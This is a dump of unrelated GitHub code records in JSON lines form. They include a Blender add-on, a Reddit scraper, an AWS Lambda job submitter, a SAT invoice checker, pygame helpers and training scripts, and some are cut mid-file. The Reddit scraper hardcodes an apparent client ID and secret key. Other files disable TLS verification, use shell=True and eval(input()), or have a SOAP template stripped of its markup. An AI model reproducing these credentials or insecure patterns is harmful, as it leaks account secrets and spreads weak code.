context.scene\n mytool = 
scene.my_tool\n \n cam = bpy.data.cameras.new(\"Camera\") \n cam_object = bpy.data.objects.new(name=\"Camera\", object_data=cam)\n cam_object.location = (0, -10, 4.5)\n cam_object.rotation_mode = \"XYZ\" \n cam_object.rotation_euler = (math.radians(75), 0, 0)\n \n rotDummy = bpy.data.objects.new( \"RotationDummy\", None )\n rotDummy.empty_draw_type = 'CUBE'\n rotDummy.location = (0, 0, 1) \n \n light = bpy.data.lamps.new(name=\"sun\", type='SUN') \n light.shadow_method = \"RAY_SHADOW\"\n lamp_object = bpy.data.objects.new(name=\"sun\", object_data=light)\n lamp_object.location = (0, 0, 10)\n \n shadowMat = bpy.data.materials.new(\"ShadowMaterial\")\n shadowMat.use_transparency = True\n shadowMat.alpha = 0.4\n shadowMat.use_only_shadow = True\n \n bpy.ops.mesh.primitive_plane_add(radius=4)\n shadowPlane = scene.objects.active\n shadowPlane.name = \"ShadowPlane\"\n shadowPlane.data.materials.append(shadowMat)\n \n scene.objects.link(lamp_object)\n scene.objects.link(rotDummy)\n scene.objects.link(cam_object)\n \n cam_object.parent = rotDummy\n crc = cam_object.constraints.new(\"TRACK_TO\")\n crc.target = rotDummy\n crc.track_axis = \"TRACK_NEGATIVE_Z\"\n \n return {'FINISHED'} \n\n# ------------------------------------------------------------------------\n# menus\n# ------------------------------------------------------------------------\n\nclass BasicMenu(bpy.types.Menu):\n bl_idname = \"ags.setup.menu\"\n bl_label = \"Setup\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"ags.setup\", text=\"Setup Renderscene\")\n\n# ------------------------------------------------------------------------\n# Draw tools in panel\n# ------------------------------------------------------------------------\n\nclass AgsRenderPanel(Panel):\n bl_idname = \"AGS_render_panel\"\n bl_label = \"AGS rendering\"\n bl_space_type = \"VIEW_3D\" \n bl_region_type = \"TOOLS\" \n bl_category = \"Tools\"\n bl_context = \"objectmode\" \n\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n mytool = scene.my_tool\n\n layout.prop(mytool, \"sidesEnum\", text=\"Sides\")\n layout.prop(mytool, \"path\", text=\"Path\")\n layout.prop_search(mytool, \"cameraTarget\", scene, \"objects\", text=\"Target\")\n \n layout.operator(\"ags.render\", text=\"Render sprites\")\n \n \nclass AgsSetupPanel(Panel):\n bl_idname = \"AGS_setup_panel\"\n bl_label = \"AGS setup\"\n bl_space_type = \"VIEW_3D\" \n bl_region_type = \"TOOLS\" \n bl_category = \"Tools\"\n bl_context = \"objectmode\" \n\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n \n layout.menu(\"ags.setup.menu\", text=\"Setup menu\") \n\n# ------------------------------------------------------------------------\n# register and unregister\n# ------------------------------------------------------------------------\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.Scene.my_tool = PointerProperty(type=RenderSettings)\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n del bpy.types.Scene.my_tool\n\nif __name__ == \"__main__\":\n register()","repo_name":"Sanderdl/AGS_Tools","sub_path":"scripts/AGS_Tools.py","file_name":"AGS_Tools.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"44952721296","text":"import pandas \nimport requests\nimport argparse\nimport json\n\n#-o is the output file\n#-s is the subreddit\nparser = 
argparse.ArgumentParser()\nparser.add_argument('-o','--output_file',help='output file')\nparser.add_argument('-s','--subreddit',help='enter a subreddit')\nargs = parser.parse_args()\n\ndef main():\n headers = reddit_auth()\n \n scrape_by_subreddit_into_file(args.subreddit,args.output_file,headers)\n\ndef reddit_auth():\n #AUTHENTICATION\n headers = {}\n CLIENT_ID = 'Fm91DhLSEMsxGwMA2m4RIQ'\n SECRET_KEY = 'XwKUdo-LCl63yS0Pp1y9tW0svMfU4A'\n auth = requests.auth.HTTPBasicAuth(CLIENT_ID,SECRET_KEY)\n with open('../auth/.env.example','r') as f:\n pw = f.read()\n data = {\n 'grant_type': 'password',\n 'username': 'Comp598_hw6',\n 'password': pw\n }\n headers = {'User-Agent': 'MyAPI/0.0.1'}\n res = requests.post('https://www.reddit.com/api/v1/access_token',\n auth=auth, data=data, headers=headers)\n TOKEN = res.json()['access_token']\n headers = {**headers, **{'Authorization': f'bearer {TOKEN}'}}\n #AUTHENTICATION\n return headers\n\ndef scrape_by_subreddit_into_file(subreddit,output_file,headers):\n #titles_for_each_subreddit = {}\n titles_array=[]\n scrape_url = 'https://oauth.reddit.com/{}/new?limit=100'.format(subreddit)\n reddit_title = requests.get(scrape_url, \n headers=headers)\n \n titles_array.append(reddit_title.json())#['data']['children'][i])#['data']['title'])\n #titles_for_each_subreddit.update({'{}'.format(subreddits):titles_array})\n \n f = open('../'+output_file,'w+')\n for i in range(0,len(titles_array)):\n jsonstr = json.dumps(titles_array[i])\n f.write(jsonstr)\n f.write('\\n')\n f.close()\n\nif __name__ == '__main__':\n main()","repo_name":"knowo1234/Data-Science-Course-McGill","sub_path":"COMP_598/assign_7/src/collect_newest.py","file_name":"collect_newest.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33217956846","text":"from __future__ import print_function\n\nimport os, sys, re, json, requests, boto3\nfrom datetime import datetime\n\nDATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n\nprint(\"Loading ISL Lambda function\")\n\nsignal_file_suffix = None\n\nif \"SIGNAL_FILE_SUFFIX\" in os.environ:\n signal_file_suffix = os.environ[\"SIGNAL_FILE_SUFFIX\"]\n\nif \"MOZART_URL\" not in os.environ:\n raise RuntimeError(\"Need to specify MOZART_URL in environment.\")\nMOZART_URL = os.environ[\"MOZART_URL\"]\nJOB_SUBMIT_URL = \"%s/api/v0.1/job/submit\" % MOZART_URL\n\ndef __get_job_type_info(data_file, job_types, default_type, default_release,\n default_queue):\n \"\"\"\n Determine the job type.\n :param data_file: The data file being ingested.\n :param job_types: A mapping of job types to a regex.\n :param default_type: Default job type.\n :param default_release: Default job release version.\n :param: default_queue: Default job queue.\n :return: Function will try to match the given data file to one of \n the types specified in the job type mapping. If no mapping exists \n or a match could not be found, then it will use the default job\n type, release, and queue.\n \"\"\"\n for type in job_types.keys():\n regex = job_types[type]['PATTERN']\n print(\"Checking if {} matches {}\".format(regex, data_file))\n match = re.search(regex, data_file)\n if match:\n release = job_types[type]['RELEASE']\n queue = job_types[type]['QUEUE']\n print(\"Data file '{}' matches job type info: \"\n \"type: {}, release: {}, queue: {}\".format(\n data_file, type, release, queue))\n return type, release, queue\n print(\"Could not match data file '{}' to a given job type: {}. 
\"\n \"Using default job type info\".format(data_file, job_types.keys()))\n return default_type, default_release, default_queue\n\n\ndef submit_job(job_spec, job_params, queue, tags=[], priority=0):\n \"\"\"Submit job to mozart via REST API.\"\"\"\n\n # setup params\n params = {\n \"queue\": queue,\n \"priority\": priority,\n \"tags\": json.dumps(tags),\n \"type\": job_spec,\n \"params\": json.dumps(job_params),\n \"name\": \"ingest-staged-{}\".format(job_params['data_file']),\n }\n\n # submit job\n print(\"Job params: %s\" % json.dumps(params))\n print(\"Job URL: %s\" % JOB_SUBMIT_URL)\n req = requests.post(JOB_SUBMIT_URL, data=params, verify=False)\n\n print(\"Request code: %s\" % req.status_code)\n print(\"Request text: %s\" % req.text)\n print(\"Request Result: %s\" % req.json())\n\n if req.status_code != 200:\n req.raise_for_status()\n result = req.json()\n \n if \"result\" in result.keys() and \"success\" in result.keys():\n if result[\"success\"] is True:\n job_id = result[\"result\"]\n print(\"submitted job: %s job_id: %s\" % (job_spec, job_id))\n else:\n print(\"job not submitted successfully: %s\" % result)\n raise Exception(\"job not submitted successfully: %s\" % result)\n else:\n raise Exception(\"job not submitted successfully: %s\" % result)\n\n\ndef lambda_handler(event, context):\n '''\n This lambda handler calls submit_job with the job type info\n and product id from the sns message\n '''\n\n print(\"Got event of type: %s\" % type(event))\n print(\"Got event: %s\" % json.dumps(event))\n print(\"Got context: %s\"% context)\n print(\"os.environ: %s\" % os.environ)\n # parse sns message\n message = json.loads(event[\"Records\"][0][\"Sns\"][\"Message\"])\n print(\"Message : %s\" % message)\n # parse s3 event\n s3_info = message['Records'][0]['s3']\n print(\"s3_info in message : %s \" % s3_info)\n # parse signal and dataset files and urls\n bucket = s3_info['bucket']['name']\n #bucket = event['Records'][0]['s3']['bucket']['name']\n trigger_file = s3_info['object']['key']\n print(\"Trigger file: {}\".format(trigger_file))\n if signal_file_suffix:\n ds_file = trigger_file.replace(signal_file_suffix, '')\n else:\n ds_file = trigger_file\n ds_url = \"s3://%s/%s/%s\" % (os.environ['DATASET_S3_ENDPOINT'], bucket,\n ds_file)\n print(\"ds_url = {}\".format(ds_url))\n # Create some metadata\n md = {\n \"tags\": [\"ISL\"],\n \"ISL_urls\": [ds_url],\n \"SNS_record\": event[\"Records\"][0],\n \"S3_event_record\": message['Records'][0],\n \"Lambda_trigger_time\": datetime.utcnow().strftime(DATETIME_FORMAT)\n }\n print(\"Metadata created: {}\".format(json.dumps(md, indent=2)))\n # data file\n id = data_file = os.path.basename(ds_url)\n \n # submit mozart jobs to update ES\n default_job_type = os.environ['JOB_TYPE'] # e.g. \"INGEST_L0A_LR_RAW\"\n default_job_release = os.environ['JOB_RELEASE'] # e.g. 
\"gman-dev\"\n default_queue = os.environ['JOB_QUEUE']\n job_types = {}\n if 'JOB_TYPES' in os.environ:\n job_types = json.loads(os.environ['JOB_TYPES'])\n\n job_type, job_release, queue = __get_job_type_info(data_file, job_types,\n default_job_type,\n default_job_release,\n default_queue)\n\n job_spec = \"job-%s:%s\" % (job_type, job_release)\n job_params = {\n \"id\": id,\n \"data_url\": ds_url,\n \"data_file\": data_file,\n \"prod_met\": md,\n }\n tags = [\"data-staged\"]\n\n # submit mozart job\n submit_job(job_spec, job_params, queue, tags)\n","repo_name":"nasa/opera-sds-lambdas","sub_path":"lambdas/isl-sns/isl-sns.py","file_name":"isl-sns.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"41694386166","text":"'''\nReid Dye\nTest 01\nHCS-A\n23 September 2021\n'''\n#%%\nfrom math import *\n\n#%%\ndef prob19():\n x=eval(input('Enter a number: '))\n if x % 2 == 0:\n if x % 4 == 0:\n y='a'\n elif x % 4 != 0:\n y='b'\n elif x % 2 != 0:\n y='c'\n \n print(y)\n\n\n#%%\ndef prob20():\n #import numpy as np\n #output=np.array([i for i in range(101, 1000, 2)])\n #output=sum(output**2)/len(output)\n #print(output)\n output=0\n for i in range(101, 1000, 2):\n output += i**2\n \n print(output/450)\n\n\n# %%\ndef prob21():\n spider=input('Word to replace spider: ')\n water=input('Word to replace water: ')\n spout=input('Word to replace spout: ')\n rain=input('Word to replace rain: ')\n print('The Itsy-Bitsy', spider, 'crawled up the', water, spout+',')\n print('Down came the', rain, 'and washed the', spider, 'out!')\n\n#%%\ndef prob22():\n # all possible permutations of a, b, and c:\n # abc, acb, bca, bac, cba, cab\n # nvm don't need to test all of those because the inputs\n # are given pre-sorted\n a,b,c = eval(input('Enter the three side lengths, from least to greatest, separated by commas: '))\n \n #unneeded\n #a=np.array([a,b,c])\n #a,b,c=np.sort(a)\n\n if a+b<=c:\n raise ValueError('Side Lengths do not form a valid triangle')\n\n if a==b==c:\n triangleType = 'equilateral'\n elif a!=b!=c!=a:\n triangleType = 'scalene'\n else:\n triangleType = 'isosceles'\n \n s=(a+b+c)/2\n\n area=round(sqrt(s*(s-a)*(s-b)*(s-c)), 2)\n\n print(\"The triangle's area is\", area, 'units^2.')\n print('The triangle is a', triangleType, 'triangle.')\n\n\nif __name__=='__main__':\n print('problem 19:')\n prob19()\n print('\\nProblem 20')\n prob20()\n print('\\nProblem 21')\n prob21()\n print('\\nProblem22')\n prob22()","repo_name":"reid23/HCS","sub_path":"Test1/Test01.py","file_name":"Test01.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38246505480","text":"import os\nimport glob\nimport argparse\n\nimport numpy as np\n\nfrom multiprocessing import Pool\nfrom PIL import Image, ImageFilter\n\n\ndef parse_args():\n \"\"\"\n Parser for the command line arguments.\n Returns\n -------\n args : Namespace\n The arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Crop and resize kaggle 2015 image data.\")\n\n parser.add_argument(\"images_folder\",\n type=str,\n help=\"Path to images to extract stats from.\")\n\n args = parser.parse_args()\n return args\n\n\ndef resize_and_pad(im, desired_size):\n \"\"\"\n Resize to desired size while keeping aspect ratio and pad the image so that\n it's a square.\n\n Parameters\n ----------\n im : numpy array\n Image to resize.\n desired_size : int\n Desired size.\n 
\"\"\"\n # argwhere gives the coordinates of every non-zero point\n true_points = np.argwhere(im)\n # take the smallest points and use them as the top left of your crop\n top_left = true_points.min(axis=0)\n # take the largest points and use them as the bottom right of your crop\n bottom_right = true_points.max(axis=0)\n box = (top_left[1], top_left[0], bottom_right[1], bottom_right[0])\n w = bottom_right[1] - top_left[1]\n h = bottom_right[0] - top_left[0]\n ratio = float(desired_size) / max((w, h))\n new_size = tuple([int(x * ratio) for x in (w, h)])\n # Convert numpy array to PIL image\n im = Image.fromarray(im)\n resized_512 = im.resize(new_size, Image.NEAREST, box)\n new_im = Image.new('RGB', (desired_size, desired_size))\n new_im.paste(resized_512, ((desired_size - new_size[0]) // 2, (desired_size - new_size[1]) // 2))\n return new_im\n\n\ndef preprocess_image(fname):\n \"\"\"\n Crop and resize an image.\n\n Parameters\n ----------\n fname : str\n Path to file.\n \"\"\"\n try:\n with Image.open(fname) as im_pil:\n # build mask\n mask = im_pil.convert('L').filter(ImageFilter.BoxBlur(20)).point(lambda x: 1 if x >= 9 else 0)\n # apply mask to the image\n im = np.array(im_pil) * np.array(mask)[..., None]\n\n # 512 resize, zero padding and save\n im_512 = resize_and_pad(im, 512)\n im_512.save(os.path.join(f\"{os.path.dirname(fname)}_512\", fname.split('/')[-1]))\n\n # Warn if the mask seems to small\n croppedmask = np.array(im_512).sum(2)\n ratio = np.round(croppedmask.flatten().nonzero()[0].size / croppedmask.size, 2)\n if ratio <= 0.66:\n print(f\"Warning: ratio ({ratio}) <= 0.66 threshold\")\n print(fname, \"\\n\")\n\n # 1024 resize, zero padding and save\n im_1024 = resize_and_pad(im, 1024)\n im_1024.save(os.path.join(f\"{os.path.dirname(fname)}_1024\", fname.split('/')[-1]))\n\n except ValueError:\n print(fname)\n pass\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n fnames = glob.glob(f\"{args.images_folder}/*.jpeg\")\n with Pool() as p:\n p.map(preprocess_image, fnames)\n","repo_name":"Museau/Retino","sub_path":"data/get_kaggle2015/crop_resize_kaggle2015_image_data.py","file_name":"crop_resize_kaggle2015_image_data.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21463151632","text":"import os\n\npath=\"G:\\\\summer\\\\JAVA\\\\123\"\n\ndef count(filename):\n file=open(filename)\n lines = file.readlines()\n count=len(lines)\n return count\n \ndef get_total(path):\n total=0\n files=os.listdir(path)\n for i in files:\n filename= os.path.join(path,i)\n j=count(filename)\n total+=j\n print(total)\n \n \nif __name__ =='__main__': \n get_total(path)","repo_name":"Tinkle-717/Object_Detection","sub_path":"train_models/Count_quantity.py","file_name":"Count_quantity.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44952567966","text":"#!/usr/bin/env python\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3, or (at your option) any later\n# version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTIBILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License\n# for more details.\n\nimport base64\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\nfrom uuid import UUID\nfrom urllib import request\nfrom xml.etree import ElementTree as ET\nfrom dateutil import parser\n\nfrom .db import connect\nfrom .portal_sat import PortalSAT\nfrom settings import (\n log,\n NAME_CER,\n PATH_OPENSSL,\n TRY_COUNT,\n)\n\n\ndef _call(args):\n return subprocess.check_output(args, shell=True).decode()\n\n\ndef get_status_sat(data):\n webservice = 'https://consultaqr.facturaelectronica.sat.gob.mx/consultacfdiservice.svc'\n soap = \"\"\"\n \n \n \n \n \n ?re={emisor_rfc}&rr={receptor_rfc}&tt={total}&id={uuid}\n \n \n \n \"\"\"\n data = soap.format(**data).encode('utf-8')\n headers = {\n 'SOAPAction': '\"http://tempuri.org/IConsultaCFDIService/Consulta\"',\n 'Content-length': str(len(data)),\n 'Content-type': 'text/xml; charset=\"UTF-8\"'\n }\n req = request.Request(url=webservice, data=data, method='POST')\n for k, v in headers.items():\n req.add_header(k, v)\n try:\n with request.urlopen(req, timeout=5) as f:\n response = f.read().decode('utf-8')\n result = re.search(\"(?s)(?<=Estado>).+?(?== self.corner_w:\n self.fill_rect.draw()\n\nclass CornerRect:\n def __init__(self, rect:pygame.Rect, border_size, color):\n # params\n self.display_surface = pygame.display.get_surface()\n self.original = rect\n self.size = border_size\n self.color = color\n self.refresh()\n \n def set_rect(self, rect):\n self.original = rect\n self.refresh()\n \n def set_topleft(self, pos):\n self.original.topleft = pos\n self.refresh()\n \n def set_center(self, pos):\n self.original.center = pos\n self.refresh()\n \n def refresh(self):\n \n # rect, corners\n self.v_rect = self.original.inflate(-self.size*2,0)\n self.h_rect = self.original.inflate(0,-self.size*2)\n self.corners = [\n (self.h_rect.topleft,self.v_rect.topleft,(self.v_rect.left,self.h_rect.top)),\n (self.h_rect.topright,self.v_rect.topright,(self.v_rect.right,self.h_rect.top)),\n (self.h_rect.bottomleft,self.v_rect.bottomleft,(self.v_rect.left,self.h_rect.bottom)),\n (self.h_rect.bottomright,self.v_rect.bottomright,(self.v_rect.right,self.h_rect.bottom))\n ]\n \n # correct\n self.v_rect.h += 1\n self.h_rect.w += 1\n self.center = self.v_rect.center\n \n def draw(self, debug=None):\n pygame.draw.rect(self.display_surface,self.color,self.h_rect)\n pygame.draw.rect(self.display_surface,self.color,self.v_rect)\n for corner in self.corners: pygame.draw.polygon(self.display_surface,self.color,corner)\n if debug: debug.blits += 7\n \nclass Timeit:\n def __init__(self):\n self.start_time = 0\n self.end_time = 0\n self.name = \"Generic Timeit\"\n \n def start(self,name):\n self.name = name\n self.start_time = time.perf_counter()\n return self\n \n def end(self):\n self.end_time = time.perf_counter()\n print(f\"{self.name} elapsed: {self.end_time-self.start_time}\")\n return self\n\n# math\ndef angle_to_vec(angle):\n return vector(math.cos(math.radians(angle)),-math.sin(math.radians(angle)))\n\ndef weighted_choice(sequence,weights):\n weightssum = sum(weights)\n chosen = randint(0,weightssum)\n cweight = 0; i = 0\n for w in weights:\n if inside_range(chosen,cweight,cweight+w): return sequence[i]\n cweight += w; i += 1\n \ndef weighted_choice_combined(sequence_and_weights):\n sequence = [s_a_w[0] for s_a_w in sequence_and_weights]\n weights = [saw[1] for saw in sequence_and_weights]\n weightssum = sum(weights)\n chosen = randint(0,weightssum)\n cweight = 0; i = 0\n for w in weights:\n if 
inside_range(chosen,cweight,cweight+w): return sequence[i]\n cweight += w; i += 1\n \ndef lerp(start, end, t): return start * (1 - t) + end * t\n \ndef inside_range(number:float|int,rangeStart:float|int,rangeEnd:float|int)->bool:\n return number >= min(rangeStart,rangeEnd) and number <= max(rangeStart,rangeEnd)\n\n# generic \ndef count_pngs(path):\n count = 0\n for f_name, sub_f, files in walk(path):\n for sub_n in sub_f:\n count += count_pngs(path+\"/\"+sub_n)\n for f in files:\n if f.endswith(\"png\"):\n count += 1\n return count \n\ndef list_remove_cond(iterable, condition):\n toremove = [el for el in iterable if condition(el)]\n for e in toremove: iterable.remove(e)\n\n# str\ndef item_from_name(name): return Item({\"name\":name})\ndef parse_items_string(string:str): return string.replace(\"items:\",\"\").split(\",\")\n\n# images\ndef import_folder(path,convert_alpha = True, scale_factor=True):\n images = []\n for _, _, image_names in walk(\"assets/graphics/\"+path):\n for image_name in image_names:\n full_path = \"assets/graphics/\"+join(path,image_name)\n image = pygame.image.load(full_path).convert_alpha() if convert_alpha else pygame.image.load(full_path).convert()\n if scale_factor: image = pygame.transform.scale_by(image,SCALE_FACTOR)\n images.append(image)\n break\n return images\n\ndef import_folder_dict(path,convert_alpha = True, scale_factor=True):\n images = {}\n for _, sub_f, image_names in walk(\"assets/graphics/\"+path):\n for image_name in image_names:\n full_path = \"assets/graphics/\"+join(path,image_name)\n image = pygame.image.load(full_path).convert_alpha() if convert_alpha else pygame.image.load(full_path).convert()\n if scale_factor: image = pygame.transform.scale_by(image,SCALE_FACTOR)\n images[image_name.split(\".\")[0]] = image\n break\n return images\n\ndef import_dict_fx(path, scale=2):\n return {\"_\".join(name.split(\"_\")[0:-1]):pygame.transform.scale_by(image, scale) for name, image in import_folder_dict(path,True,False).items()}\n\ndef load(path,convert_alpha = True,scale_factor=True):\n image = pygame.image.load(\"assets/graphics/\"+path+\".png\").convert_alpha() if convert_alpha else pygame.image.load(\"assets/graphics/\"+path+\".png\").convert()\n if scale_factor: return pygame.transform.scale_by(image,SCALE_FACTOR)\n return image\n\ndef load_scale(path,scale_factor,convert_alpha = True):\n return pygame.transform.scale_by(pygame.image.load(\"assets/graphics/\"+path+\".png\").convert_alpha() if convert_alpha \\\n else pygame.image.load(\"assets/graphics/\"+path+\".png\").convert() ,scale_factor)\n \ndef parse_sprites_ratio(assets, size=UI_INNER_SLOT_SIZE):\n sprites = {}\n for name, img in assets.items():\n w,h = img.get_size()\n if w > h:\n ratio = w/size\n image = pygame.transform.scale(img,(int(size),int(h/ratio)))\n sprites[name] = (image,image.get_rect())\n else:\n ratio = h/size\n image = pygame.transform.scale(img,(int(w/ratio),int(size)))\n sprites[name] = (image,image.get_rect())\n return sprites\n\ndef only_sprites_from_tuple(sprites): return {name:sprite for name, (sprite,_) in sprites.items()}\n\n# sheets\ndef load_sheet(path, size, convert_alpha=False,scale=1): return Spritesheet(load(path,convert_alpha,False),size).frames(scale)\ndef parse_sheets(sheet_dict): return {name:SingleSpritesheet(sheet).frames() for name, sheet in sheet_dict.items()}\n 
","repo_name":"Damus666/DinoDungeon","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71687805705","text":"from pathlib import Path\nfrom multiprocessing import Process, Queue\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as K\n\nimport vnet\nimport data_kits\nfrom config import cfg\nimport utils\n\nparams = {\n \"dstRes\": np.array([1, 1, 1.5], dtype=float),\n \"VolSize\": np.array([128, 128, 64], dtype=int),\n \"normDir\": False # if rotates the volume according to its transformation in the mhd file. Not reccommended.\n}\n\n\ndef load_data():\n dataloader = data_kits.DataManager(cfg.dirTrain, cfg.dirResult, params)\n dataloader.loadTrainingData()\n howManyImages = len(dataloader.sitkImages)\n howManyGT = len(dataloader.sitkGT)\n assert howManyImages == howManyGT\n print(f\"The dataset has shape: data - {howManyImages}. labels - {howManyGT}\")\n numpyImages = dataloader.getNumpyImages()\n numpyGT = dataloader.getNumpyGT()\n for key in numpyImages:\n fg = numpyImages[key][numpyImages[key] > 0]\n numpyImages[key] -= fg.mean()\n numpyImages[key] /= fg.std()\n return numpyImages, numpyGT\n\n\ndef prepare_data_thread(dataQueue, numpyImages, numpyGT, seed=1234):\n nr_iter = cfg.numIterations\n batchsize = cfg.batchSize\n\n keysIMG = list(numpyImages.keys())\n\n nr_iter_dataAug = nr_iter * batchsize\n np.random.seed(seed)\n whichDataList = np.random.randint(len(keysIMG), size=int(nr_iter_dataAug / cfg.nProc))\n whichDataForMatchingList = np.random.randint(len(keysIMG), size=int(nr_iter_dataAug / cfg.nProc))\n\n for whichData, whichDataForMatching in zip(whichDataList, whichDataForMatchingList):\n path = keysIMG[whichData]\n\n currGtKey = path.parent / (path.stem + '_segmentation.mhd')\n currImgKey = path\n\n # data agugumentation through hist matching across different examples...\n ImgKeyMatching = keysIMG[whichDataForMatching]\n\n defImg = numpyImages[currImgKey]\n defLab = numpyGT[currGtKey]\n\n defImg = data_kits.hist_match(defImg, numpyImages[ImgKeyMatching])\n\n if np.random.rand(1)[0] > 0.5: # do not apply deformations always, just sometimes\n defImg, defLab = data_kits.produce_randomly_deformed_image(\n defImg, defLab, cfg.numcontrolpoints, cfg.sigma)\n\n defImg = defImg.astype(np.float32)\n defLab = (defLab > 0.5).astype(np.int32)\n\n # weightData = np.zeros_like(defLab, dtype=float)\n # weightData[defLab == 1] = np.prod(defLab.shape) / np.sum((defLab == 1).astype(dtype=np.float32))\n # weightData[defLab == 0] = np.prod(defLab.shape) / np.sum((defLab == 0).astype(dtype=np.float32))\n\n dataQueue.put(tuple((defImg[..., None], defLab, None)))\n\n\ndef train():\n # Load data and prepare training samples\n numpyImages, numpyGT = load_data()\n dataQueue = Queue(30) # max 50 images in queue\n dataPreparation = [None] * cfg.nProc\n\n # thread creation\n for proc in range(cfg.nProc):\n dataPreparation[proc] = Process(target=prepare_data_thread, args=(dataQueue, numpyImages, numpyGT))\n dataPreparation[proc].daemon = True\n dataPreparation[proc].start()\n\n def data_gen():\n for _ in range(cfg.numIterations * cfg.batchSize):\n defImg, defLab, _ = dataQueue.get()\n yield defImg, defLab\n\n print(\"Load data.\")\n # tensorflow data loader\n h, w, d = params[\"VolSize\"]\n dataset = tf.data.Dataset.from_generator(data_gen, (tf.float32, tf.int32),\n (tf.TensorShape([h, w, d, 1]), tf.TensorShape([h, w, d])))\n dataset = 
dataset.batch(batch_size=cfg.batchSize)\n\n print(\"Build model.\")\n # build model\n model = vnet.VNet([h, w, d, 1], cfg.batchSize, cfg.ncls)\n learning_rate = cfg.baseLR\n learning_rate = K.optimizers.schedules.ExponentialDecay(learning_rate, cfg.decay_steps, cfg.decay_rate, True)\n optim = K.optimizers.SGD(learning_rate, momentum=0.99)\n criterion = K.losses.SparseCategoricalCrossentropy(from_logits=True)\n\n @tf.function\n def train_step(x, y):\n # Forward\n with tf.GradientTape() as tape:\n prediction = model(x)\n losses = criterion(y, prediction)\n # Backward\n with tf.name_scope(\"Gradients\"):\n gradients = tape.gradient(losses, model.trainable_variables)\n optim.apply_gradients(zip(gradients, model.trainable_variables))\n return losses, prediction\n\n # File writer\n writer, logdir = utils.summary_writer(cfg)\n # Trace graph\n tf.summary.trace_on(graph=True)\n train_step(tf.zeros([1, h, w, d, 1]), tf.zeros([1, h, w, d])) # dry run for tracing graph (step=1)\n tf.summary.trace_export(\"OpGraph\", 0)\n\n print(\"Start training.\")\n save_path = logdir / \"snapshots\"\n total_loss = 0\n dice = None\n for trImg, trLab in dataset:\n loss, pred = train_step(trImg, trLab)\n step = optim.iterations.numpy() # (step start from 2)\n loss_val = loss.numpy()\n\n # Loss moving average\n total_loss = loss_val if step < 5 else \\\n cfg.moving_average * total_loss + (1 - cfg.moving_average) * loss_val\n\n # Logging\n if (step < 500 and step % 10 == 0) or step % cfg.log_interval == 0:\n dice = utils.compute_dice(trLab, pred)\n print(f\"Step: {step}, Loss: {loss_val:.4f}, Dice: {dice:.4f}, \"\n f\"LR: {learning_rate(step).numpy():.2E}\")\n\n # Summary scalars and images\n tf.summary.scalar(\"loss\", total_loss, step=step)\n tf.summary.scalar(\"dice\", dice, step=step)\n tf.summary.image(\"trImg\", trImg[..., d // 2, :], step=step)\n tf.summary.image(\"pred\", pred[..., d // 2, :], step=step)\n\n # Take snapshots\n if step == 2 or step % cfg.snap_shot_interval == 0:\n filepath = utils.snapshot(model, save_path, step)\n print(f\"Model weights saved (Path: {filepath}).\")\n\n # Ending\n filepath = utils.snapshot(model, save_path, optim.iterations.numpy())\n print(f\"Model weights saved ({filepath}).\\nTraining ended.\")\n writer.close()\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"Jarvis73/VNet-Tensorflow-V2","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42857445324","text":"import numpy as np\nfrom math import floor\nimport torch\nimport torch.optim as optim\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass WaypointDistributionNN(nn.Module):\n def __init__(self, x_size, alpha, clamp):\n super(WaypointDistributionNN, self).__init__()\n self.alpha = alpha\n self.clamp = clamp\n \n # c1 = 50\n # k1 = 5\n # s1 = 1\n # p1 = 3\n # \n # c2 = 250\n # k2 = 5\n # s2 = 5\n # p2 = 3\n # \n # c3 = 250\n # k3 = 3\n # s3 = 2\n # p3 = 2\n # self.conv1 = nn.Conv1d(1, c1, k1, stride=s1, padding=p1).double()\n # self.conv2 = nn.Conv1d(c1, c2, k2, stride=s2, padding=p2).double()\n # self.conv3 = nn.Conv1d(c2, c3, k3, stride=s3, padding=p3).double()\n # x_size = floor((x_size + 2*p1 - k1)/s1 + 1)\n # x_size = floor((x_size + 2*p2 - k2)/s2 + 1)\n # x_size = floor((x_size + 2*p3 - k3)/s3 + 1)\n # x_size = x_size*c3\n # self.fc1 = nn.Linear(x_size, x_size).double()\n # self.fc2 = nn.Linear(x_size, floor(x_size/10)).double()\n # self.fc3 = 
